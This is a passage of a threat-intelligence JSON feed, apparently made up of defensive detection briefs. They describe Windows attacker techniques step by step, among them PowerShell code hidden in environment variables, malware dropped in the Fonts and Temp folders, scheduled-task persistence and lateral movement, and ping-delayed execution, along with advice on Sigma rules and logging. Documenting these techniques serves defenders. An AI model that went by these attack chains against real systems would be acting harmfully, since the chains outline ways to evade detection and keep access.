the system, possibly through phishing or exploiting a software vulnerability.\u003c/li\u003e\n\u003cli\u003ePowerShell is invoked, either directly or indirectly, via a script or another process.\u003c/li\u003e\n\u003cli\u003eThe attacker sets an environment variable containing malicious code or a command. This might involve using \u003ccode\u003e[Environment]::SetEnvironmentVariable\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eA PowerShell script is executed that reads the content of the environment variable using \u003ccode\u003e$env:\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe content read from the environment variable is passed to \u003ccode\u003eInvoke-Expression\u003c/code\u003e or its alias \u003ccode\u003eiex\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eInvoke-Expression\u003c/code\u003e dynamically executes the code, effectively bypassing static analysis.\u003c/li\u003e\n\u003cli\u003eThe executed code downloads and executes a secondary payload, such as a keylogger or a remote access tool.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as stealing credentials or establishing persistent access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the execution of arbitrary code on the compromised system, allowing attackers to install malware, steal sensitive data, or establish a persistent foothold. The VIP Keylogger campaign, for example, demonstrates how this technique can be used to harvest user credentials. Due to the obfuscated nature of this attack, it is difficult to detect and remediate, often leading to extended dwell time for the attacker. Compromised systems can be further used as a launchpad for attacks against other systems within the network.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable PowerShell Script Block Logging (Event ID 4104) on all Windows systems to capture the de-obfuscated script blocks before execution.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rules to your SIEM to detect PowerShell scripts that access environment variables and use \u003ccode\u003eInvoke-Expression\u003c/code\u003e or its aliases. Tune these rules to your environment to reduce false positives.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by these rules to determine if malicious activity is occurring.\u003c/li\u003e\n\u003cli\u003eMonitor PowerShell execution for suspicious environment variable access and dynamic code execution.\u003c/li\u003e\n\u003cli\u003eImplement application control to prevent the execution of unauthorized PowerShell scripts.\u003c/li\u003e\n\u003cli\u003eReview and harden PowerShell execution policies to limit the attack surface.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-powershell-env-var-execution/","summary":"Adversaries use PowerShell to execute malicious code stored in environment variables, leveraging Invoke-Expression or its aliases to bypass static analysis and execute payloads dynamically, as seen in malware loaders and stagers like the VIP Keylogger.","title":"PowerShell Execution via Environment Variables","url":"https://feed.craftedsignal.io/briefs/2024-01-powershell-env-var-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["high"],"_cs_tags":["defense-evasion","persistence","privilege-escalation","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection identifies the creation of executable or script files in unusual directories on Windows systems. Adversaries often leverage these unconventional locations to evade standard security monitoring and establish persistence. The technique involves placing malicious files with extensions like \u003ccode\u003e.exe\u003c/code\u003e, \u003ccode\u003e.dll\u003c/code\u003e, \u003ccode\u003e.ps1\u003c/code\u003e, and others in directories such as \u003ccode\u003e\\windows\\fonts\\\u003c/code\u003e, \u003ccode\u003e\\users\\public\\\u003c/code\u003e, \u003ccode\u003e\\Windows\\debug\\\u003c/code\u003e, and others deemed atypical for such file types. This activity can bypass traditional signature-based detections and enable the execution of unauthorized code. The scope of this threat covers Windows systems where such file creation events are logged and monitored. This is important for defenders because successful exploitation leads to arbitrary code execution, persistence and further malicious activity within the compromised environment.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system, potentially through exploitation of a vulnerability or compromised credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker navigates to a suspicious directory, such as \u003ccode\u003eC:\\Windows\\Fonts\\\u003c/code\u003e or \u003ccode\u003eC:\\Users\\Public\\\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker drops a malicious executable file (e.g., \u003ccode\u003eevil.exe\u003c/code\u003e) or a script (e.g., \u003ccode\u003eevil.ps1\u003c/code\u003e) into the chosen directory.\u003c/li\u003e\n\u003cli\u003eThe attacker employs techniques to execute the malicious file, such as creating a scheduled task, modifying registry keys, or leveraging other \u0026ldquo;living off the land\u0026rdquo; binaries.\u003c/li\u003e\n\u003cli\u003eThe malicious file executes, performing actions such as establishing persistence, escalating privileges, or deploying additional malware.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the established persistence to maintain access to the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker performs lateral movement to other systems within the network, utilizing tools such as PsExec or PowerShell.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their ultimate objective, such as data exfiltration, system disruption, or ransomware deployment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the installation of malware, unauthorized access to sensitive data, and complete system compromise. The creation of executables in suspicious paths is a common technique used by various threat actors. Multiple analytic stories are tagged, including PlugX, LockBit Ransomware, and Volt Typhoon. This technique is leveraged to evade detection and maintain a persistent presence on the compromised system.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon EventID 11 logging to capture file creation events, which is the data source for the analytic.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect the creation of executables or scripts in suspicious paths.\u003c/li\u003e\n\u003cli\u003eInvestigate and validate any alerts generated by the Sigma rule, focusing on the process and user context.\u003c/li\u003e\n\u003cli\u003eImplement file integrity monitoring (FIM) on critical directories to detect unauthorized file modifications.\u003c/li\u003e\n\u003cli\u003eReview and harden file system permissions to restrict write access to suspicious directories.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-03-executable-creation-suspicious-path/","summary":"This analytic identifies the creation of executables or scripts in suspicious file paths on Windows systems, where adversaries often use these paths to evade detection and maintain persistence, potentially leading to unauthorized code execution, privilege escalation, or persistence within the environment.","title":"Executable or Script Creation in Suspicious Paths","url":"https://feed.craftedsignal.io/briefs/2024-01-03-executable-creation-suspicious-path/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Windows","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["lateral-movement","execution","windows","scheduled-task"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","SentinelOne"],"content_html":"\u003cp\u003eThis detection identifies remote scheduled task creations on a target host, which can be indicative of lateral movement. Adversaries often leverage scheduled tasks to execute malicious commands, maintain persistence, or escalate privileges. This technique is particularly effective as it uses native Windows functionality, making it harder to distinguish from legitimate administrative actions. This rule is designed for data generated by Elastic Defend and also supports third-party data sources such as SentinelOne Cloud Funnel and Sysmon. Understanding when and how scheduled tasks are created remotely is crucial for detecting and responding to potential intrusions. The rule focuses on network connections from svchost.exe and registry modifications related to task actions.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to a system, potentially through phishing or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised system to scan the network for potential targets.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to authenticate to a target Windows host using stolen credentials or by exploiting a vulnerability in a network service.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes a network connection to the target host\u0026rsquo;s Task Scheduler service, typically using ports in the dynamic port range (49152+). This connection originates from svchost.exe.\u003c/li\u003e\n\u003cli\u003eThe attacker creates a new scheduled task on the target system using the Task Scheduler service.\u003c/li\u003e\n\u003cli\u003eThis creation involves modifying the registry key \u003ccode\u003eHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{TaskID}\\Actions\u003c/code\u003e to define the task\u0026rsquo;s actions. The \u0026lsquo;Actions\u0026rsquo; value is often base64 encoded.\u003c/li\u003e\n\u003cli\u003eThe scheduled task executes a malicious payload, granting the attacker further access or control over the target system.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the newly gained access for lateral movement, data exfiltration, or other malicious objectives.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized access to sensitive systems, data breaches, and further lateral movement within the network. The rule is designed to catch this activity, reducing the dwell time of attackers and minimizing potential damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rules to your SIEM and tune for your environment to detect malicious scheduled task creation.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 3 (Network Connection) and Sysmon Registry Events to enhance visibility into network connections and registry modifications (see Setup instructions).\u003c/li\u003e\n\u003cli\u003eReview the base64 encoded tasks actions registry value to investigate the task configured action (see rule description).\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule to determine the legitimacy of the scheduled task creation and the intent behind the configured action.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-remote-scheduled-task-creation/","summary":"This rule identifies remote scheduled task creations on a target Windows host, potentially indicating lateral movement by adversaries, by monitoring network connections and registry modifications related to task scheduling.","title":"Detecting Remote Scheduled Task Creation for Lateral Movement","url":"https://feed.craftedsignal.io/briefs/2024-01-remote-scheduled-task-creation/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":true,"_cs_products":["Windows"],"_cs_severities":["high"],"_cs_tags":["execution","script","temp"],"_cs_type":"threat","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection identifies suspicious script executions originating from temporary directories. Threat actors often leverage temporary folders to stage and execute malicious scripts, such as PowerShell, VBScript, or even HTML applications (MSHTA) to evade detection or bypass security controls. These scripts can be delivered through various means, including phishing attacks, drive-by downloads, or as part of a multi-stage malware infection. The execution of scripts from temporary directories is generally uncommon for legitimate software, making it a valuable indicator of potentially malicious activity. This detection focuses on identifying processes like powershell.exe, pwsh.exe, mshta.exe, wscript.exe, and cscript.exe executing from or referencing standard temporary paths in their command line.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA malicious script (e.g., PowerShell, VBScript) is downloaded or dropped into a temporary directory such as \u003ccode\u003eC:\\Windows\\Temp\u003c/code\u003e, \u003ccode\u003e\\AppData\\Local\\Temp\u003c/code\u003e, or similar.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a process like \u003ccode\u003ecmd.exe\u003c/code\u003e or \u003ccode\u003epowershell.exe\u003c/code\u003e to invoke the downloaded script.\u003c/li\u003e\n\u003cli\u003eThe script executes, potentially performing reconnaissance, privilege escalation, or lateral movement.\u003c/li\u003e\n\u003cli\u003eThe script may download additional payloads from a remote server.\u003c/li\u003e\n\u003cli\u003eThe script establishes persistence through registry modification or scheduled tasks.\u003c/li\u003e\n\u003cli\u003eThe script performs malicious actions such as data exfiltration or ransomware deployment.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to remove the initial script files to cover their tracks.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to a range of consequences, including data theft, system compromise, and ransomware infection. The execution of malicious scripts from temporary directories can provide attackers with a foothold in the network, allowing them to move laterally, escalate privileges, and ultimately achieve their objectives. Depending on the script\u0026rsquo;s capabilities, it could also lead to system instability or denial of service.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious Script Execution From Temp Folder\u0026rdquo; to your SIEM to detect script execution from temporary directories. Tune the rule\u0026rsquo;s filters for known-good software installers in your environment to reduce false positives.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging with command line arguments to capture the necessary information for the Sigma rule (logsource: process_creation).\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the parent process and the script\u0026rsquo;s actions.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of scripts from temporary directories where possible.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T14:30:00Z","date_published":"2024-01-02T14:30:00Z","id":"/briefs/2024-01-script-exec-temp/","summary":"This brief covers a detection for suspicious script execution, such as PowerShell, WScript, or MSHTA, originating from common temporary directories, potentially indicating malware activity.","title":"Suspicious Script Execution from Temporary Directory","url":"https://feed.craftedsignal.io/briefs/2024-01-script-exec-temp/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["low"],"_cs_tags":["execution","defense-evasion","windows","ping","lolbas"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers may use ping to introduce pauses, allowing them to execute harmful scripts or binaries stealthily. This delayed execution is often observed during malware installation and is consistent with an attacker attempting to evade detection. The adversary uses \u003ccode\u003eping.exe\u003c/code\u003e with the \u003ccode\u003e-n\u003c/code\u003e argument from within a \u003ccode\u003ecmd.exe\u003c/code\u003e shell, and the parent process is running under a user context other than SYSTEM. The subsequent process is \u003ccode\u003ecmd.exe\u003c/code\u003e invoking a known malicious utility, such as \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003emshta.exe\u003c/code\u003e, \u003ccode\u003erundll32.exe\u003c/code\u003e, or an executable from the user\u0026rsquo;s AppData directory without a valid code signature. This behavior is often observed during malware installation.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attack begins with an initial access vector (not specified in source).\u003c/li\u003e\n\u003cli\u003eThe adversary executes \u003ccode\u003ecmd.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ecmd.exe\u003c/code\u003e spawns \u003ccode\u003eping.exe\u003c/code\u003e with the \u003ccode\u003e-n\u003c/code\u003e argument to introduce a delay, typically to evade detection (\u003ccode\u003eping.exe -n [number] 127.0.0.1\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eAfter the delay introduced by \u003ccode\u003eping.exe\u003c/code\u003e, the same \u003ccode\u003ecmd.exe\u003c/code\u003e process executes a potentially malicious utility such as \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003emshta.exe\u003c/code\u003e, \u003ccode\u003erundll32.exe\u003c/code\u003e, \u003ccode\u003ecertutil.exe\u003c/code\u003e, or \u003ccode\u003eregsvr32.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eAlternatively, \u003ccode\u003ecmd.exe\u003c/code\u003e might execute a binary located within the user\u0026rsquo;s AppData directory that lacks a valid code signature.\u003c/li\u003e\n\u003cli\u003eThe malicious utility executes arbitrary commands or scripts, potentially downloading further payloads or modifying system configurations.\u003c/li\u003e\n\u003cli\u003eThe attacker gains a foothold on the system, enabling further malicious activities such as lateral movement or data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to malware installation, system compromise, and data theft. While the source does not quantify the number of victims or specific sectors targeted, a successful compromise can lead to significant operational disruption and data breaches. The use of delayed execution makes it more difficult for traditional security solutions to detect malicious activity.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Delayed Execution via Ping\u0026rdquo; to your SIEM to detect the execution of commonly abused Windows utilities via a delayed Ping execution.\u003c/li\u003e\n\u003cli\u003eEnable process monitoring with command-line argument logging to capture the execution of \u003ccode\u003eping.exe\u003c/code\u003e and subsequent processes for analysis.\u003c/li\u003e\n\u003cli\u003eImplement application whitelisting to prevent unauthorized execution of scripts and binaries, focusing on the utilities identified in the rule.\u003c/li\u003e\n\u003cli\u003eReview and tune the provided Sigma rule, including the listed exclusions, to reduce false positives in your specific environment.\u003c/li\u003e\n\u003cli\u003eMonitor process execution from unusual locations like the AppData directory, especially for unsigned executables, as indicated in the rule\u0026rsquo;s detection logic.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T14:00:00Z","date_published":"2024-01-02T14:00:00Z","id":"/briefs/2024-01-delayed-execution-via-ping/","summary":"Adversaries may use ping to delay execution of malicious commands, scripts, or binaries to evade detection, often observed during malware installation.","title":"Windows Delayed Execution via Ping Followed by Malicious Utilities","url":"https://feed.craftedsignal.io/briefs/2024-01-delayed-execution-via-ping/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["medium"],"_cs_tags":["persistence","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection focuses on identifying the creation and subsequent deletion of scheduled tasks within a short timeframe on Windows systems. Attackers may abuse the scheduled task functionality to execute malicious code, establish persistence, or perform other unauthorized actions. By quickly deleting the task after execution, they attempt to evade detection and remove traces of their activity. This behavior is often associated with attackers trying to proxy malicious execution via the schedule service and then cleaning up to avoid leaving forensic artifacts. The detection logic looks for the sequence of task creation followed by deletion within a five-minute window. This activity is captured via Windows Security Event Logs when the \u0026ldquo;Audit Other Object Access Events\u0026rdquo; setting is enabled.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the target system. (T1053.005)\u003c/li\u003e\n\u003cli\u003eThe attacker uses legitimate Windows utilities like \u003ccode\u003eschtasks.exe\u003c/code\u003e or PowerShell cmdlets to create a new scheduled task.\u003c/li\u003e\n\u003cli\u003eThe scheduled task is configured to execute a malicious payload, such as a script or executable. The payload could be staged on disk or downloaded from a remote server.\u003c/li\u003e\n\u003cli\u003eThe scheduled task executes the malicious payload, achieving the attacker\u0026rsquo;s objective (e.g., establishing persistence, executing commands, or deploying malware).\u003c/li\u003e\n\u003cli\u003eThe attacker, or the malicious payload itself, uses \u003ccode\u003eschtasks.exe\u003c/code\u003e or PowerShell to delete the scheduled task.\u003c/li\u003e\n\u003cli\u003eThe deletion occurs within a short time (less than 5 minutes) after task creation to minimize the window for detection.\u003c/li\u003e\n\u003cli\u003eThe attacker may also delete associated log files or other artifacts to further cover their tracks.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as maintaining persistence, escalating privileges, or exfiltrating data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to persistent access, arbitrary code execution, privilege escalation, and data compromise. While the specific impact varies depending on the attacker\u0026rsquo;s objectives, the ability to execute code via scheduled tasks provides a significant foothold within the compromised system. This can lead to lateral movement, data exfiltration, or further compromise of the network.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable \u0026ldquo;Audit Other Object Access Events\u0026rdquo; in Windows Security Event Logs to generate the necessary events for detection.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Temporarily Scheduled Task Creation\u0026rdquo; to your SIEM to detect rapid task creation and deletion.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule to determine if the activity is legitimate or malicious.\u003c/li\u003e\n\u003cli\u003eMonitor scheduled task creation events for unusual task names, command-line arguments, or user accounts.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unauthorized executables and scripts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-temp-scheduled-task/","summary":"Detection of rapid creation and deletion of scheduled tasks on Windows, indicating potential malicious activity abusing the task scheduler for execution and cleanup.","title":"Windows Temporarily Scheduled Task Creation and Deletion","url":"https://feed.craftedsignal.io/briefs/2024-01-temp-scheduled-task/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["execution","windows","process_injection","privilege_escalation"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThe Service Host process (svchost.exe) is a legitimate Windows system process designed to host multiple Windows services. It is not intended to be used by non-Windows services or to spawn command interpreters directly. This detection focuses on identifying instances where cmd.exe is launched as a child process of svchost.exe. This activity is highly suspicious and may suggest that a malicious process is masquerading as svchost.exe or that an attacker has gained control and is attempting privilege escalation or lateral movement within the compromised system. The rule leverages process monitoring logs to identify this anomalous parent-child relationship. The original Elastic detection rule was published in 2020, and updated in May 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial Compromise: An attacker gains initial access to a Windows system through various means, such as exploiting a vulnerability or using stolen credentials.\u003c/li\u003e\n\u003cli\u003ePrivilege Escalation: The attacker attempts to escalate privileges to gain higher-level access to the system.\u003c/li\u003e\n\u003cli\u003eService Exploitation: The attacker exploits a service hosted by svchost.exe or injects malicious code into a service process.\u003c/li\u003e\n\u003cli\u003eCommand Execution: The attacker leverages the compromised service to spawn cmd.exe as a child process of svchost.exe.\u003c/li\u003e\n\u003cli\u003eReconnaissance: The attacker uses cmd.exe to perform reconnaissance activities, such as gathering system information or network configuration details.\u003c/li\u003e\n\u003cli\u003eLateral Movement: The attacker uses cmd.exe to move laterally to other systems on the network, potentially using stolen credentials or exploiting vulnerabilities.\u003c/li\u003e\n\u003cli\u003ePersistence: The attacker establishes persistence on the compromised system to maintain access even after a reboot.\u003c/li\u003e\n\u003cli\u003eData Exfiltration or System Damage: The attacker exfiltrates sensitive data from the compromised system or damages the system to disrupt operations.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to privilege escalation, lateral movement, data theft, or system compromise. The impact could range from minor data breaches to significant disruptions of business operations, depending on the attacker\u0026rsquo;s objectives and the extent of the compromise. Since svchost.exe is a critical system process, any compromise could result in widespread damage across the affected system.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Svchost spawning Cmd\u0026rdquo; Sigma rule to your SIEM to detect this suspicious parent-child relationship.\u003c/li\u003e\n\u003cli\u003eEnable process monitoring with command-line logging on Windows endpoints to provide the necessary data for the Sigma rule to function.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule to determine the root cause and scope of the compromise.\u003c/li\u003e\n\u003cli\u003eReview and harden the security configuration of Windows services to prevent exploitation.\u003c/li\u003e\n\u003cli\u003eEnforce the principle of least privilege to limit the impact of a compromised service account.\u003c/li\u003e\n\u003cli\u003eUse threat intelligence platforms to identify and block known malicious indicators associated with svchost.exe exploits.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-svchost-cmd-spawn/","summary":"Detection of cmd.exe being spawned by svchost.exe, which is an unusual behavior indicative of potential masquerading or privilege escalation attempts on Windows systems.","title":"Suspicious Svchost.exe Child Process: cmd.exe","url":"https://feed.craftedsignal.io/briefs/2024-01-svchost-cmd-spawn/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Elastic Defend","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["initial-access","defense-evasion","execution","explorer.exe","dcom"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eAttackers frequently exploit Windows Explorer (explorer.exe) to execute malicious code due to its inherent trust within the operating system. This involves spawning child processes such as PowerShell, cmd.exe, or other scripting engines via Component Object Model (COM) and Distributed Component Object Model (DCOM). This technique enables attackers to bypass security controls, blending malicious activity with legitimate system processes. The detection rule identifies such anomalies by monitoring child processes of Explorer with specific characteristics, excluding known benign activities, to flag potential threats. This activity is frequently associated with initial access and execution of follow-on malware.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attack begins with an initial access vector such as spearphishing (T1566).\u003c/li\u003e\n\u003cli\u003eA user clicks a malicious link or opens an attachment, leading to code execution.\u003c/li\u003e\n\u003cli\u003eThe initial payload exploits explorer.exe through DCOM using the -Embedding argument.\u003c/li\u003e\n\u003cli\u003eExplorer.exe spawns a child process such as powershell.exe, cmd.exe, or mshta.exe (T1059, T1218).\u003c/li\u003e\n\u003cli\u003eThe spawned process executes malicious commands or scripts.\u003c/li\u003e\n\u003cli\u003eThese commands might download or execute additional payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves code execution, potentially gaining persistence on the system.\u003c/li\u003e\n\u003cli\u003eThe ultimate objective is often lateral movement, data exfiltration, or deploying ransomware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code within a trusted process context, bypassing application whitelisting and other security controls. This can lead to initial access, privilege escalation, and persistence within the compromised system. The compromise can remain undetected for extended periods due to the trusted nature of the parent process (explorer.exe), enabling attackers to perform reconnaissance, deploy malware, exfiltrate data, or disrupt services.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging with command line details to detect suspicious explorer.exe child processes.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious Explorer Child Process - PowerShell\u0026rdquo; to identify instances of PowerShell spawned by explorer.exe with suspicious arguments.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious Explorer Child Process - Scripting Engines\u0026rdquo; to detect other scripting engines launched by explorer.exe.\u003c/li\u003e\n\u003cli\u003eMonitor process execution events for processes like powershell.exe, cmd.exe, cscript.exe, wscript.exe, mshta.exe, regsvr32.exe, and rundll32.exe with a parent process of explorer.exe and the argument \u0026ldquo;-Embedding\u0026rdquo; via process creation logs.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict execution of unsigned or untrusted scripts and executables.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-suspicious-explorer-child-process/","summary":"Adversaries abuse the trusted status of explorer.exe to launch malicious scripts or executables, often using DCOM to start processes like PowerShell or cmd.exe, achieving initial access, defense evasion, and execution.","title":"Suspicious Explorer Child Process via DCOM","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-explorer-child-process/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","SentinelOne Cloud Funnel","Excel","MS Access","MS Publisher","PowerPoint","Word","Outlook"],"_cs_severities":["low"],"_cs_tags":["command-prompt","network-connection","windows","execution","command-and-control"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eThis detection identifies suspicious network connections initiated by the command prompt (cmd.exe) on Windows systems. The rule focuses on cmd.exe processes executed with specific arguments, such as those indicating script execution (e.g., *.bat, *.cmd), access to remote resources (e.g., URLs), or those spawned by Microsoft Office applications (Excel, Word, etc.). Attackers frequently abuse cmd.exe to download malicious payloads, execute commands, or establish command and control channels. This detection aims to identify such potentially malicious activity by correlating process creation events with subsequent network connections. The rule excludes common private and reserved IP address ranges to reduce false positives. The targeted systems are Windows endpoints where adversaries attempt to leverage cmd.exe for malicious purposes.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user opens a malicious document (e.g., Word, Excel) or executes a seemingly benign application.\u003c/li\u003e\n\u003cli\u003eThe document or application contains a macro or script that initiates a cmd.exe process.\u003c/li\u003e\n\u003cli\u003eThe cmd.exe process is launched with arguments indicating script execution (\u003ccode\u003e/c\u003c/code\u003e, \u003ccode\u003e/k\u003c/code\u003e) and referencing a remote resource (e.g., a URL) or a local batch file.\u003c/li\u003e\n\u003cli\u003eThe cmd.exe process attempts to download a payload from a remote server using protocols like HTTP, HTTPS, or FTP.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is saved to disk, often with a disguised filename.\u003c/li\u003e\n\u003cli\u003eThe cmd.exe process executes the downloaded payload, initiating further malicious actions.\u003c/li\u003e\n\u003cli\u003eThe malicious payload establishes a command and control (C2) channel with a remote server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the C2 channel to send commands to the compromised system, potentially leading to data exfiltration or other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the compromise of Windows 